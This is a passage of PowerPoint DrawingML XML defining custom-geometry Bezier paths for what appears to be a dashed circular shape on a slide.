                    <a:pt x="1994" y="1588"/>
                    <a:pt x="1995" y="1590"/>
                    <a:pt x="1997" y="1591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="1592"/>
                    <a:pt x="2001" y="1591"/>
                    <a:pt x="2002" y="1590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2006" y="1584"/>
                    <a:pt x="2009" y="1578"/>
                    <a:pt x="2012" y="1572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2013" y="1570"/>
                    <a:pt x="2012" y="1568"/>
                    <a:pt x="2010" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="1565"/>
                    <a:pt x="2006" y="1566"/>
                    <a:pt x="2005" y="1568"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="1532"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2020" y="1538"/>
                    <a:pt x="2017" y="1544"/>
                    <a:pt x="2014" y="1550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2013" y="1552"/>
                    <a:pt x="2014" y="1555"/>
                    <a:pt x="2016" y="1556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="1557"/>
                    <a:pt x="2020" y="1556"/>
                    <a:pt x="2021" y="1554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024" y="1548"/>
                    <a:pt x="2027" y="1542"/>
                    <a:pt x="2030" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2031" y="1534"/>
                    <a:pt x="2030" y="1532"/>
                    <a:pt x="2028" y="1531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2027" y="1530"/>
                    <a:pt x="2024" y="1530"/>
                    <a:pt x="2023" y="1532"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="1496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2037" y="1502"/>
                    <a:pt x="2035" y="1508"/>
                    <a:pt x="2032" y="1514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2031" y="1516"/>
                    <a:pt x="2032" y="1519"/>
                    <a:pt x="2034" y="1520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="1521"/>
                    <a:pt x="2038" y="1520"/>
                    <a:pt x="2039" y="1518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2042" y="1512"/>
                    <a:pt x="2045" y="1506"/>
                    <a:pt x="2047" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2048" y="1497"/>
                    <a:pt x="2047" y="1495"/>
                    <a:pt x="2045" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2043" y="1493"/>
                    <a:pt x="2041" y="1494"/>
                    <a:pt x="2040" y="1496"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2055" y="1459"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="1465"/>
                    <a:pt x="2050" y="1472"/>
                    <a:pt x="2048" y="1478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2047" y="1480"/>
                    <a:pt x="2048" y="1482"/>
                    <a:pt x="2050" y="1483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2052" y="1484"/>
                    <a:pt x="2054" y="1483"/>
                    <a:pt x="2055" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="1475"/>
                    <a:pt x="2060" y="1468"/>
                    <a:pt x="2063" y="1462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2064" y="1460"/>
                    <a:pt x="2063" y="1458"/>
                    <a:pt x="2061" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2059" y="1456"/>
                    <a:pt x="2056" y="1457"/>
                    <a:pt x="2055" y="1459"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2069" y="1422"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="1428"/>
                    <a:pt x="2065" y="1434"/>
                    <a:pt x="2063" y="1441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="1443"/>
                    <a:pt x="2063" y="1445"/>
                    <a:pt x="2065" y="1446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="1446"/>
                    <a:pt x="2069" y="1445"/>
                    <a:pt x="2070" y="1443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2072" y="1437"/>
                    <a:pt x="2075" y="1431"/>
                    <a:pt x="2077" y="1424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2078" y="1422"/>
                    <a:pt x="2077" y="1420"/>
                    <a:pt x="2074" y="1419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2072" y="1419"/>
                    <a:pt x="2070" y="1420"/>
                    <a:pt x="2069" y="1422"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2080" y="1390"/>
                    <a:pt x="2078" y="1396"/>
                    <a:pt x="2076" y="1403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2075" y="1405"/>
                    <a:pt x="2076" y="1407"/>
                    <a:pt x="2078" y="1408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="1409"/>
                    <a:pt x="2083" y="1407"/>
                    <a:pt x="2083" y="1405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2086" y="1399"/>
                    <a:pt x="2088" y="1393"/>
                    <a:pt x="2090" y="1386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2090" y="1384"/>
                    <a:pt x="2089" y="1382"/>
                    <a:pt x="2087" y="1381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085" y="1380"/>
                    <a:pt x="2083" y="1382"/>
                    <a:pt x="2082" y="1384"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="1345"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2091" y="1352"/>
                    <a:pt x="2090" y="1358"/>
                    <a:pt x="2088" y="1365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2087" y="1367"/>
                    <a:pt x="2088" y="1369"/>
                    <a:pt x="2090" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="1370"/>
                    <a:pt x="2095" y="1369"/>
                    <a:pt x="2095" y="1367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2097" y="1360"/>
                    <a:pt x="2099" y="1354"/>
                    <a:pt x="2101" y="1347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2101" y="1345"/>
                    <a:pt x="2100" y="1343"/>
                    <a:pt x="2098" y="1343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2096" y="1342"/>
                    <a:pt x="2094" y="1343"/>
                    <a:pt x="2093" y="1345"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="1307"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2101" y="1313"/>
                    <a:pt x="2100" y="1320"/>
                    <a:pt x="2098" y="1326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1328"/>
                    <a:pt x="2099" y="1330"/>
                    <a:pt x="2101" y="1331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2103" y="1331"/>
                    <a:pt x="2105" y="1330"/>
                    <a:pt x="2106" y="1328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="1322"/>
                    <a:pt x="2109" y="1315"/>
                    <a:pt x="2111" y="1308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="1306"/>
                    <a:pt x="2110" y="1304"/>
                    <a:pt x="2107" y="1304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="1303"/>
                    <a:pt x="2103" y="1305"/>
                    <a:pt x="2103" y="1307"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="1268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="1274"/>
                    <a:pt x="2108" y="1281"/>
                    <a:pt x="2107" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="1289"/>
                    <a:pt x="2108" y="1291"/>
                    <a:pt x="2110" y="1292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="1292"/>
                    <a:pt x="2114" y="1291"/>
                    <a:pt x="2115" y="1289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2116" y="1282"/>
                    <a:pt x="2117" y="1276"/>
                    <a:pt x="2119" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="1267"/>
                    <a:pt x="2118" y="1265"/>
                    <a:pt x="2116" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="1264"/>
                    <a:pt x="2111" y="1265"/>
                    <a:pt x="2111" y="1268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="1268"/>
                    <a:pt x="2111" y="1268"/>
                    <a:pt x="2111" y="1268"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="1228"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2117" y="1235"/>
                    <a:pt x="2115" y="1241"/>
                    <a:pt x="2114" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1250"/>
                    <a:pt x="2115" y="1252"/>
                    <a:pt x="2118" y="1253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1253"/>
                    <a:pt x="2122" y="1251"/>
                    <a:pt x="2122" y="1249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="1243"/>
                    <a:pt x="2124" y="1236"/>
                    <a:pt x="2125" y="1229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1227"/>
                    <a:pt x="2124" y="1225"/>
                    <a:pt x="2122" y="1225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1225"/>
                    <a:pt x="2118" y="1226"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="1228"/>
                    <a:pt x="2118" y="1228"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="1189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="1195"/>
                    <a:pt x="2121" y="1202"/>
                    <a:pt x="2120" y="1209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1211"/>
                    <a:pt x="2122" y="1213"/>
                    <a:pt x="2124" y="1213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1213"/>
                    <a:pt x="2128" y="1212"/>
                    <a:pt x="2128" y="1210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1203"/>
                    <a:pt x="2130" y="1196"/>
                    <a:pt x="2131" y="1190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1187"/>
                    <a:pt x="2129" y="1185"/>
                    <a:pt x="2127" y="1185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1185"/>
                    <a:pt x="2123" y="1186"/>
                    <a:pt x="2123" y="1189"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2126" y="1149"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1156"/>
                    <a:pt x="2125" y="1162"/>
                    <a:pt x="2125" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1171"/>
                    <a:pt x="2126" y="1173"/>
                    <a:pt x="2128" y="1173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1173"/>
                    <a:pt x="2133" y="1172"/>
                    <a:pt x="2133" y="1170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2133" y="1163"/>
                    <a:pt x="2134" y="1156"/>
                    <a:pt x="2134" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1147"/>
                    <a:pt x="2133" y="1145"/>
                    <a:pt x="2131" y="1145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1145"/>
                    <a:pt x="2127" y="1147"/>
                    <a:pt x="2126" y="1149"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1116"/>
                    <a:pt x="2128" y="1122"/>
                    <a:pt x="2128" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1131"/>
                    <a:pt x="2129" y="1133"/>
                    <a:pt x="2131" y="1133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1133"/>
                    <a:pt x="2136" y="1132"/>
                    <a:pt x="2136" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1123"/>
                    <a:pt x="2136" y="1116"/>
                    <a:pt x="2137" y="1109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1107"/>
                    <a:pt x="2135" y="1105"/>
                    <a:pt x="2133" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1105"/>
                    <a:pt x="2129" y="1107"/>
                    <a:pt x="2129" y="1109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6"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4116862" y="2354281"/>
              <a:ext cx="3214033" cy="3212126"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2132 w 2138"/>
                <a:gd name="T1" fmla="*/ 1011 h 2137"/>
                <a:gd name="T2" fmla="*/ 2111 w 2138"/>
                <a:gd name="T3" fmla="*/ 869 h 2137"/>
                <a:gd name="T4" fmla="*/ 2101 w 2138"/>
                <a:gd name="T5" fmla="*/ 789 h 2137"/>
                <a:gd name="T6" fmla="*/ 2063 w 2138"/>
                <a:gd name="T7" fmla="*/ 696 h 2137"/>
                <a:gd name="T8" fmla="*/ 2023 w 2138"/>
                <a:gd name="T9" fmla="*/ 605 h 2137"/>
                <a:gd name="T10" fmla="*/ 1983 w 2138"/>
                <a:gd name="T11" fmla="*/ 513 h 2137"/>
                <a:gd name="T12" fmla="*/ 1920 w 2138"/>
                <a:gd name="T13" fmla="*/ 435 h 2137"/>
                <a:gd name="T14" fmla="*/ 1862 w 2138"/>
                <a:gd name="T15" fmla="*/ 358 h 2137"/>
                <a:gd name="T16" fmla="*/ 1757 w 2138"/>
                <a:gd name="T17" fmla="*/ 261 h 2137"/>
                <a:gd name="T18" fmla="*/ 1693 w 2138"/>
                <a:gd name="T19" fmla="*/ 206 h 2137"/>
                <a:gd name="T20" fmla="*/ 1616 w 2138"/>
                <a:gd name="T21" fmla="*/ 155 h 2137"/>
                <a:gd name="T22" fmla="*/ 1522 w 2138"/>
                <a:gd name="T23" fmla="*/ 109 h 2137"/>
                <a:gd name="T24" fmla="*/ 1433 w 2138"/>
                <a:gd name="T25" fmla="*/ 63 h 2137"/>
                <a:gd name="T26" fmla="*/ 1315 w 2138"/>
                <a:gd name="T27" fmla="*/ 37 h 2137"/>
                <a:gd name="T28" fmla="*/ 1217 w 2138"/>
                <a:gd name="T29" fmla="*/ 18 h 2137"/>
                <a:gd name="T30" fmla="*/ 1118 w 2138"/>
                <a:gd name="T31" fmla="*/ 1 h 2137"/>
                <a:gd name="T32" fmla="*/ 1014 w 2138"/>
                <a:gd name="T33" fmla="*/ 5 h 2137"/>
                <a:gd name="T34" fmla="*/ 922 w 2138"/>
                <a:gd name="T35" fmla="*/ 14 h 2137"/>
                <a:gd name="T36" fmla="*/ 782 w 2138"/>
                <a:gd name="T37" fmla="*/ 47 h 2137"/>
                <a:gd name="T38" fmla="*/ 723 w 2138"/>
                <a:gd name="T39" fmla="*/ 57 h 2137"/>
                <a:gd name="T40" fmla="*/ 633 w 2138"/>
                <a:gd name="T41" fmla="*/ 102 h 2137"/>
                <a:gd name="T42" fmla="*/ 540 w 2138"/>
                <a:gd name="T43" fmla="*/ 140 h 2137"/>
                <a:gd name="T44" fmla="*/ 428 w 2138"/>
                <a:gd name="T45" fmla="*/ 224 h 2137"/>
                <a:gd name="T46" fmla="*/ 361 w 2138"/>
                <a:gd name="T47" fmla="*/ 274 h 2137"/>
                <a:gd name="T48" fmla="*/ 289 w 2138"/>
                <a:gd name="T49" fmla="*/ 338 h 2137"/>
                <a:gd name="T50" fmla="*/ 218 w 2138"/>
                <a:gd name="T51" fmla="*/ 436 h 2137"/>
                <a:gd name="T52" fmla="*/ 162 w 2138"/>
                <a:gd name="T53" fmla="*/ 518 h 2137"/>
                <a:gd name="T54" fmla="*/ 99 w 2138"/>
                <a:gd name="T55" fmla="*/ 621 h 2137"/>
                <a:gd name="T56" fmla="*/ 68 w 2138"/>
                <a:gd name="T57" fmla="*/ 717 h 2137"/>
                <a:gd name="T58" fmla="*/ 40 w 2138"/>
                <a:gd name="T59" fmla="*/ 813 h 2137"/>
                <a:gd name="T60" fmla="*/ 17 w 2138"/>
                <a:gd name="T61" fmla="*/ 906 h 2137"/>
                <a:gd name="T62" fmla="*/ 9 w 2138"/>
                <a:gd name="T63" fmla="*/ 1050 h 2137"/>
                <a:gd name="T64" fmla="*/ 2 w 2138"/>
                <a:gd name="T65" fmla="*/ 1130 h 2137"/>
                <a:gd name="T66" fmla="*/ 16 w 2138"/>
                <a:gd name="T67" fmla="*/ 1225 h 2137"/>
                <a:gd name="T68" fmla="*/ 40 w 2138"/>
                <a:gd name="T69" fmla="*/ 1326 h 2137"/>
                <a:gd name="T70" fmla="*/ 61 w 2138"/>
                <a:gd name="T71" fmla="*/ 1424 h 2137"/>
                <a:gd name="T72" fmla="*/ 115 w 2138"/>
                <a:gd name="T73" fmla="*/ 1532 h 2137"/>
                <a:gd name="T74" fmla="*/ 162 w 2138"/>
                <a:gd name="T75" fmla="*/ 1619 h 2137"/>
                <a:gd name="T76" fmla="*/ 212 w 2138"/>
                <a:gd name="T77" fmla="*/ 1707 h 2137"/>
                <a:gd name="T78" fmla="*/ 295 w 2138"/>
                <a:gd name="T79" fmla="*/ 1793 h 2137"/>
                <a:gd name="T80" fmla="*/ 366 w 2138"/>
                <a:gd name="T81" fmla="*/ 1863 h 2137"/>
                <a:gd name="T82" fmla="*/ 439 w 2138"/>
                <a:gd name="T83" fmla="*/ 1932 h 2137"/>
                <a:gd name="T84" fmla="*/ 562 w 2138"/>
                <a:gd name="T85" fmla="*/ 2000 h 2137"/>
                <a:gd name="T86" fmla="*/ 636 w 2138"/>
                <a:gd name="T87" fmla="*/ 2041 h 2137"/>
                <a:gd name="T88" fmla="*/ 721 w 2138"/>
                <a:gd name="T89" fmla="*/ 2075 h 2137"/>
                <a:gd name="T90" fmla="*/ 861 w 2138"/>
                <a:gd name="T91" fmla="*/ 2109 h 2137"/>
                <a:gd name="T92" fmla="*/ 944 w 2138"/>
                <a:gd name="T93" fmla="*/ 2126 h 2137"/>
                <a:gd name="T94" fmla="*/ 1039 w 2138"/>
                <a:gd name="T95" fmla="*/ 2137 h 2137"/>
                <a:gd name="T96" fmla="*/ 1179 w 2138"/>
                <a:gd name="T97" fmla="*/ 2124 h 2137"/>
                <a:gd name="T98" fmla="*/ 1260 w 2138"/>
                <a:gd name="T99" fmla="*/ 2121 h 2137"/>
                <a:gd name="T100" fmla="*/ 1375 w 2138"/>
                <a:gd name="T101" fmla="*/ 2085 h 2137"/>
                <a:gd name="T102" fmla="*/ 1455 w 2138"/>
                <a:gd name="T103" fmla="*/ 2061 h 2137"/>
                <a:gd name="T104" fmla="*/ 1545 w 2138"/>
                <a:gd name="T105" fmla="*/ 2026 h 2137"/>
                <a:gd name="T106" fmla="*/ 1645 w 2138"/>
                <a:gd name="T107" fmla="*/ 1960 h 2137"/>
                <a:gd name="T108" fmla="*/ 1726 w 2138"/>
                <a:gd name="T109" fmla="*/ 1902 h 2137"/>
                <a:gd name="T110" fmla="*/ 1821 w 2138"/>
                <a:gd name="T111" fmla="*/ 1828 h 2137"/>
                <a:gd name="T112" fmla="*/ 1883 w 2138"/>
                <a:gd name="T113" fmla="*/ 1755 h 2137"/>
                <a:gd name="T114" fmla="*/ 1965 w 2138"/>
                <a:gd name="T115" fmla="*/ 1637 h 2137"/>
                <a:gd name="T116" fmla="*/ 2011 w 2138"/>
                <a:gd name="T117" fmla="*/ 1566 h 2137"/>
                <a:gd name="T118" fmla="*/ 2056 w 2138"/>
                <a:gd name="T119" fmla="*/ 1480 h 2137"/>
                <a:gd name="T120" fmla="*/ 2088 w 2138"/>
                <a:gd name="T121" fmla="*/ 1364 h 2137"/>
                <a:gd name="T122" fmla="*/ 2119 w 2138"/>
                <a:gd name="T123" fmla="*/ 1269 h 2137"/>
                <a:gd name="T124" fmla="*/ 2125 w 2138"/>
                <a:gd name="T125" fmla="*/ 1168 h 2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38" h="2137">
                  <a:moveTo>
                    <a:pt x="2130" y="1067"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1075"/>
                    <a:pt x="2130" y="1082"/>
                    <a:pt x="2130" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1091"/>
                    <a:pt x="2132" y="1093"/>
                    <a:pt x="2134" y="1093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1093"/>
                    <a:pt x="2138" y="1091"/>
                    <a:pt x="2138" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1082"/>
                    <a:pt x="2138" y="1075"/>
                    <a:pt x="2138" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1065"/>
                    <a:pt x="2136" y="1063"/>
                    <a:pt x="2134" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="1063"/>
                    <a:pt x="2130" y="1065"/>
                    <a:pt x="2130" y="1067"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1027"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1034"/>
                    <a:pt x="2130" y="1040"/>
                    <a:pt x="2130" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1049"/>
                    <a:pt x="2132" y="1051"/>
                    <a:pt x="2134" y="1051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1051"/>
                    <a:pt x="2138" y="1049"/>
                    <a:pt x="2138" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1040"/>
                    <a:pt x="2137" y="1033"/>
                    <a:pt x="2137" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1025"/>
                    <a:pt x="2135" y="1023"/>
                    <a:pt x="2133" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1023"/>
                    <a:pt x="2129" y="1025"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="987"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="994"/>
                    <a:pt x="2128" y="1001"/>
                    <a:pt x="2128" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1009"/>
                    <a:pt x="2130" y="1011"/>
                    <a:pt x="2132" y="1011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1011"/>
                    <a:pt x="2136" y="1009"/>
                    <a:pt x="2136" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1000"/>
                    <a:pt x="2135" y="993"/>
                    <a:pt x="2135" y="987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="984"/>
                    <a:pt x="2133" y="983"/>
                    <a:pt x="2131" y="983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="983"/>
                    <a:pt x="2127" y="985"/>
                    <a:pt x="2127" y="987"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="948"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="954"/>
                    <a:pt x="2125" y="961"/>
                    <a:pt x="2125" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="970"/>
                    <a:pt x="2127" y="971"/>
                    <a:pt x="2130" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="971"/>
                    <a:pt x="2133" y="969"/>
                    <a:pt x="2133" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2133" y="960"/>
                    <a:pt x="2132" y="953"/>
                    <a:pt x="2131" y="947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="944"/>
                    <a:pt x="2129" y="943"/>
                    <a:pt x="2127" y="943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="943"/>
                    <a:pt x="2123" y="945"/>
                    <a:pt x="2123" y="948"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="908"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="915"/>
                    <a:pt x="2120" y="921"/>
                    <a:pt x="2121" y="928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="930"/>
                    <a:pt x="2123" y="931"/>
                    <a:pt x="2125" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="931"/>
                    <a:pt x="2129" y="929"/>
                    <a:pt x="2129" y="927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="920"/>
                    <a:pt x="2127" y="913"/>
                    <a:pt x="2126" y="907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="905"/>
                    <a:pt x="2123" y="903"/>
                    <a:pt x="2121" y="903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="904"/>
                    <a:pt x="2118" y="906"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="869"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="875"/>
                    <a:pt x="2114" y="882"/>
                    <a:pt x="2115" y="888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2115" y="890"/>
                    <a:pt x="2117" y="892"/>
                    <a:pt x="2119" y="892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="891"/>
                    <a:pt x="2123" y="889"/>
                    <a:pt x="2123" y="887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="880"/>
                    <a:pt x="2120" y="874"/>
                    <a:pt x="2119" y="867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="865"/>
                    <a:pt x="2117" y="864"/>
                    <a:pt x="2114" y="864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="864"/>
                    <a:pt x="2111" y="867"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="869"/>
                    <a:pt x="2111" y="869"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="830"/>
                  </a:moveTo>
